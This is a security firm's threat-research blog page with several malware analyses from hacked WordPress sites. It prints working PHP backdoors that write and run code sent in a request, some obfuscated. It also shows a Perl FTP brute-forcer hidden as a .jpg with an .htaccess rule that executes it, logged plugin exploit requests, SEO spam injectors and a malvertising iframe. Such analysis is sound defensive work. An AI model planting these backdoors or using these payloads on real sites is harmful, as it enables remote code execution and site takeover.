Sucuri Labs

The home of our Security Engineering Group, including our Threat Research, Technical Security and Automation teams.

Hidding a hacktool using a .jpg extension

Hackers will do anything to hide their intentions behind the files they upload to compromised websites. This time, we’ve found a hacktool hidden inside a .jpg file.

As expected, the file was found inside the “images” directory of WordPress’ theme Twenty Twelve and named love.jpg. Lovely, right? By using this tool, the hacker would be able not only to manage, download, and upload files but even try to brute force the FTP users.

Below we can see part of the code used for the brute force option:

#------------------------------------------------------------------------------ 
# Brute Forcer Form 
#------------------------------------------------------------------------------ 
sub BruteForcerForm 
{ 
 my $result=""; 
 $result .= <<END; 

<table> 

<tr> 
<td colspan="2" align="center"> 
####################################<br> 
FTP brute forcer<br> 
Note: Only scan from 1 to 3 user<br> 
#################################### 
<form name="f" method="POST" action="$ScriptLocation"> 

<input type="hidden" name="a" value="bruteforcer"/> 
</td> 
</tr> 
<tr> 
<td>User:<br><textarea rows="18" cols="30" name="user"> 
END 
chop($result .= `less /etc/passwd | cut -d: -f1`); 
$result .= <<'END'; 
</textarea></td> 
<td> 

Pass:<br> 
<textarea rows="18" cols="30" name="pass">test 
test1 
test2 
test3 
test123 
test12 
1test 
2test 
3test 
12test 
123test 
2012test 
test2012 

The list of passwords goes on. We can see that the malicious code attempts the most common and weak passwords first to try to catch users who don’t implement strong credentials.

We also found this code inside the .htaccess file located in the same directory:

Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .jpg

The hacktool was written as a .cgi file, then disguised as a .jpg file to avoid appearing suspicious inside the image directory. The .htaccess code made sure to run the .jpg file as .cgi, so it could work as intended.

Malware-Serving Spam to Search Engine Bots

We recently discovered this malware with a list of IP ranges belonging to search engines that are serving them SEO spam. It even takes a snapshot of the website it’s on and uses that as a template so the pages look like they are a part of the website.

You can see some of the IP addresses the malware is looking for:

Here are some of the types of content being injected into the template page:

The left-side.php file contains the template taken from the main site where the malware is on:

As you can see, the malware uses special strings found in the template to know which parts to insert the spam into. The last part is a base64 encoded URL that leads to this spam(Viagra) website: hxxp://getbrowserssl[dot]xyz/tds/index.php?pl=aldactone

hxxp://thewebsite[dot]com/right-side.php?qid=2395&qcall=aldactone+mtf

This type of malware has the potential to do some lasting damage to any website, as spam pages are indexed by search engines, which can take weeks or months to drop. Page ranking and keywords might take even longer to fix, if at all.

Malware Campaign Evolves to Target New Plugins: May...

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites. Easily automated vulnerabilities are the first choice for bad actors, who typically target different, vulnerable sites during a week period — by rotating malicious domains and injected code, they can improve their chances of avoiding detection.

Plugins Under Attack: May 2019

    WP Live Chat Support
    Ultimate FAQ
    Freemius Library (Multiple plugins are affected)
    WooCommerce Extra Fields
    SupportCandy
    Yellow Pencil Visual Theme Customizer
    Social Warfare
    WordPress GDPR Compliance
    Newspaper and other old tagDiv Themes
    Easy WP SMTP
    WP Total Donations
    Yuzo Related Post

Plugin Payloads Added to the Campaign

WP Live Chat Support

103.211.219.200 - wplc_custom_js=eval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+1...skipped...105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B&wplc_save_settings=1 [21/May/2019] "POST /wp-admin/admin-ajax.php

Ultimate FAQ

51.15.51.186 - home=https%3A%2F%2Fdetectnewfavorite[.]com%2Fpoi%3Fj%3D1%26 [14/May/2019] "POST /wp-admin/admin-ajax.php?Action=EWD_UFAQ_UpdateOptions 

Freemius Library (Multiple plugins are affected)

51.15.51.186 - - [14/May] "POST /wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=home&option_value=https://detectnewfavorite[.]com/poi?j=1&

WooCommerce Extra Fields

46.105.99.163 - --cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Anm_personalizedproduct_upload_file\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0Aupload.php\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22settings_auto.php\x22\x0D\x0AContent-Type: multipart/form-data\x0D\x0A\x0D\x0A\x0D\x0Askipped...;\x0D\x0A\x0D\x0A@unlink(__FILE__);\x0D\x0A?>\x0D\x0A\x0D\x0A--cf5dc1d9a5f08a640376009baccda0d0--\x0D\x0A [06/May/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1

SupportCandy

46.105.99.163 - - [06/May] "GET /wp-admin/admin-ajax.php?action=wpsc_tickets&setting_action=rb_upload_file HTTP/1.1"

Yellow Pencil Visual Theme Customizer

51.15.51.186 - yp_json_import_data=%5B%7B%22home%22%3A%22aHR0cHM6Ly9kZXRlY3RuZXdmYXZvcml0ZS5jb20vcG9pP2o9MSY%3D%22%7D%5D [14/May] "POST /wp-admin/admin-post.php?yp_remote_get=test HTTP/1.1

Malicious Domains and IPs:

IPs:

    185.238.0.152
    103.211.219.200
    185.212.129.164
    51.15.51.186
    185.212.128.214
    185.238.0.153
    46.105.99.163
    165.227.48.147

Malicious Domains:

    letsmakesomechoice[.]com
    garrygudini[.]com
    blackawardago[.]com
    detectnewfavorite[.]com
    myearthsongs[.]info
    traveltogandi[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Threat intelligence gathering from slight changes in malicious...

We found the following PHP backdoor in August 2018 along with other malware samples uploaded after hackers exploit a specific vulnerable WordPress plugin covered in this previous post.

<?php @file_put_contents('cleartemp','<?php '.base64_decode($_REQUEST['q'])); 
@include('cleartemp'); 
@unlink('cleartemp'); ?>

It’s a short piece of malware, but it uses the file_put_contents to create (or overwrite if already existing) a file named cleartemp. Then it inserts the PHP code that is provided by the hacker through a crafted HTTP request containing the PHP code within a string of base64 encoded text. Next, it is decoded so the PHP code can be written to the cleartemp file.

We also found a variation of the above sample within a separate file:

<?php $a = base64_decode($_POST['b']); 
$c = '/tmp/b'; file_put_contents($c,'<?php '.$a); 
include($c); 
unlink($c);

These two malware samples ultimately accomplish the same task of writing code to a specified file, the code being supplied by an HTTP request, and then including that newly written file to the current running PHP script before deleting it. Although the two samples do the same task, it’s important to analyze the changes as it can help to show us how hackers are reacting to existing security controls and what they are doing to evade these security controls when they are encountered.

After analyzing the code from both samples, we can see the following:

They stopped using the @ error control operator which silences any errors that may be generated by the malicious code and helps aides in evading detection, but at the cost of the code being more likely to trigger scanning signatures.
They have moved to using variables ($a and $c) to store the filename and payload delivery used in the file_put_contents function. This can be helpful in evading detection by a scanner’s signatures or just human analysis as using a variable name like $a is less suspicious than directly including base64_decode($_POST[ code.

Although the coding changes between the two malware samples were not major, they were sufficient enough so that the second malware sample was able to avoid detection by online scanning tools after the first sample was already being detected. This makes it a good example in showing how analysis of the changes in a malware’s code can help reveal how the threat/malware operator is responding to existing security measures. This allows us to make better security tools with the knowledge of knowing how the threat/malware operator has responded in the past.

Hosting page templates causing your website ad campaign...

It's quite common that hosting providers have templates set for pages like 40x and 50x error pages but it's uncommon for those templates to have ads in them, or even worse, having malvertising that will blacklist your site.

On a recent case, we came across a scenario where Google AdWords was blocking a campaign of a website due to URLs from www[.]iyfipgun[.]com.

Upon closer inspection the URLs were coming from the template that the hosting provider had set for the 404 Not Found pages.This was the code:

<!DOCTYPE HTML>
<html>

    <head>
        <title>404 Error - Page Not Found</title>
        <style>
            #ad_frame{ height:800px; width:100%; }
            body{ margin:0; border: 0; padding: 0; }
        </style>
        <script src="//ajax.googleapis[.]com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
        <script type="text/javascript" language="JavaScript">
            var url = 'hxxp://www[.]iyfipgun[.]com/?dn='
                + document.domain + '&pid=9POL6F2H4';

            $(document).ready(function() {
                $('#ad_frame').attr('src', url);
            });
        </script>
    </head>
    <body>
        <iframe id="ad_frame" src="hxxp://www[.]iyfipgun[.]com/"
            frameborder="0" scrolling="no">

            <!-- browser does not support iframe's -->

        </iframe>
    </body>

 </html>

If you are experiencing a similar report from any external providers such as AdWords, the template pages are the best place to start your investigation.

If this is indeed proven the culprit, a quick fix is to just force your own handle for certain pages on the .htaccess file such as:

ErrorDocument 404 "not found"

This means that it will simply display “not found” instead of showing the template page.

Hex’ing the CSS Style Attribute for Black Hat...

Dealing with Black Hat SEO injections on our daily operation is always fun and challenging at the same time. One day, we may work with heavily obfuscated codes but on another, it can be just spam in plain-text waiting to be removed.

In the last few months, we’ve seen and reported on different techniques used by attackers— ranging from using DOM-based JavaScript obfuscation to just plain CSS style manipulation. All of these attacks share the same goal, which is to make their spamblocks invisible to human visitors but accessible to be indexed by search engine crawlers t.

On a recent case, we found yet another simple but very interesting Black Hat SEO injection on a compromised website. The following malware was added on the theme’s header.php of a WordPress site:

<?php
print '<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">';
for ($i1 = 0; $i1 < 18; $i1++) {
  $link1 = mt_rand(100, 9999999);
  echo "<a href=\"http://compromisedwebsite.com/wp-news.php?t=" .$link1. "\">viagra" .$link1. "</a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-stories.php?t=" .$link1. "\">casino" .$link1. t;/a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-max.php?t=" .$link1. "\">drugs" .$link1. "</a><br>\r\n";
  $i1++;
} ; 
print '</div>';
?>

The PHP code will then generate an HTML code to the site header as below;

<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">
<a href="http://compromisedwebsite.com/wp-news.php?t=3743996">viagra3743996</a><br>
<a href="http:// compromisedwebsite.com/wp-stories.php?t=3743996">casino3743996</a><br>
...
<a href="http:// compromisedwebsite.com/wp-stories.php?t=8106883">casino8106883</a><br>
<a href="http:// compromisedwebsite.com/wp-max.php?t=8106883">drugs8106883</a><br>
</div>

The code makes use of hex characters to obfuscate a CSS style attribute in order to hide the spam blocks. Converting those characters to ASCII text, we can see it is just a normal display:none, a style attribute used to hide elements within the div tag on the web browser.

$ echo "\64\69\73\70\6c\61\79" | xxd -r -p
display
$ echo "\6e\6f\6e\65" | xxd -r -p
none

As a site owner, it’s very important to have mechanisms to detect, prevent, and remediate issues in place before search engine crawlers can fetch the hacked version of our site. The sooner we act on the problem, the lesser the effects on our SEO and Search Engine Results Page (SERP) entries. Use our SiteCheck Scanner to regularly scan your site for unwanted spam, and let us know if want to get it cleaned.

array_diff_ukey Usage in Malware Obfuscation

We discovered a PHP backdoor on a WordPress installation that contained some interesting obfuscation methods to keep it hidden from prying eyes:

$zz1 = chr(95).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110);
$ss2 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95)."content".chr(115);
$bs = chr(98).chr(97).chr(115).chr(101)."64"."_".chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
$bngd = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);
$b = $bngd.$bs($_REQUEST[chr(100).chr(49)]);
@array_diff_ukey(@array((string)($zz1) => 1), @array((string)($b) => 2), $ss2);
@include($zz1);
@unlink($zz1);

The five separate variables ($zz1, $ss2, $bs, $bngd, $b) are obfuscated by converting their values from a decimal value to its normal ASCII character using the chr function (see this chart for more info on character conversions). Usually, this is seen in PHP malware obfuscation.

@array_diff_ukey(@array((string)($zz1) => 1), @array((string)($b) => 2), $ss2);
@include($zz1);
@unlink($zz1);

What isn’t seen as often is the use of array_diff_ukey to obfuscate how the backdoor uses file_put_contents:

array_diff_ukey is a PHP function that compares two arrays using another function which is defined by the user—in this case, it is file_put_contents.
The first array is constructed using the filename defined in the $zz1 variable that will be injected with PHP code.
The second array is hiding the PHP code that will be used in the injection:

<?php base64_decode($_REQUEST[d1])

This PHP code will allow the hacker to decide what code will then be evaluated later. They pass the PHP code to the file by submitting a base64-encoded HTTP request containing the PHP code.
The final part of the array_diff_ukey is the function that should be used to compare the two arrays, but in this case the comparison uses file_put_contents to inject the above PHP code into the filename from $zz1.

After the PHP code injection, the backdoor then uses the include function to evaluate the injected file’s PHP code before it finally deletes the injected file using unlink.

You can see the base64-encoded string in the browser’s URL which decodes to the PHP code to be evaluated:

echo "You've been hacked!";

This type of obfuscation is useful for rearranging the normal format of file_put_contents, which is a function that is commonly used in malware. So if you want to remain undetected, then obfuscating it within the backdoor code would be helpful.